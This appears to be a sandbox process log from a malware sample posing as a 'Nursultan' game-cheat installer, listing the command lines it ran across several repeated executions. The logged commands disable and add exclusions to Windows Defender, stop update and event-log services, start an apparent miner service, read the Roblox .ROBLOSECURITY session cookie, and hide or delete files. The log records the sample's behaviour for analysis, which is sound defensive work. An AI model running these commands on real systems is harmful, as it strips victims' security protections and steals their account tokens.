C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

